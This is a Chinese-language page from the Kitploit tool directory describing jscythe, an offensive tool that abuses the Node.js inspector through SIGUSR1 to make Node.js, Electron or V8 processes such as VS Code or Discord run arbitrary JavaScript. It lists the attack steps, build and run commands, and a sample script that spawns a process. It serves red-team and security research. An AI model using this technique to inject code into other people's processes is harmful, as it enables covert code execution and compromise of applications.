Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
jscythe — 滥用 Node.js inspector 机制,强制任何基于 Node.js/Electron/V8 的进程执行任意 JavaScript 代码。 | Kitploit
工具/GitHubGitHub/evilsocket/jscythe
漏洞利用后渗透利用红队远程访问工具
GitHubevilsocket/jscythe

jscythe

滥用 Node.js inspector 机制,强制任何基于 Node.js/Electron/V8 的进程执行任意 JavaScript 代码。

查看仓库
33124461年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

jscythe 滥用 Node.js 的检查器机制,以强制任何基于 Node.js/Electron/v8 的进程执行任意 JavaScript 代码,即使其调试功能已被禁用。

vscode

已在 Visual Studio Code、Discord、任何 Node.js 应用程序等环境中测试并运行!

使用方法

  1. 定位目标进程。
  2. 向进程发送 SIGUSR1 信号,这将在某个端口上启用调试器(具体端口取决于软件,有时是随机的,有时是固定的)。
  3. 通过对比发送 SIGUSR1 前后的开放端口差异,确定调试端口。
  4. 从 http://localhost:<port>/json 获取 WebSocket 调试 URL 和会话 ID。
  5. 发送带有指定代码的 Runtime.evaluate 请求。
  6. 坐享其成。

构建

root@kitploit:~
cargo build --release

运行

针对特定进程并执行基本表达式:

root@kitploit:~
./target/release/jscythe --pid 666 --code "5 - 3 + 2"

从文件中执行代码:

root@kitploit:~
./target/release/jscythe --pid 666 --script example_script.js

example_script.js 可以引用任何 Node 模块并执行任意代码,例如:

root@kitploit:~
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout

按表达式搜索进程:

root@kitploit:~
./target/release/jscythe --search extensionHost --script example_script.js

其他选项

运行 jscythe --help 查看完整选项列表。

许可证

本项目由 @evilsocket 倾心制作,并以 GPL3 许可证发布。

下载工具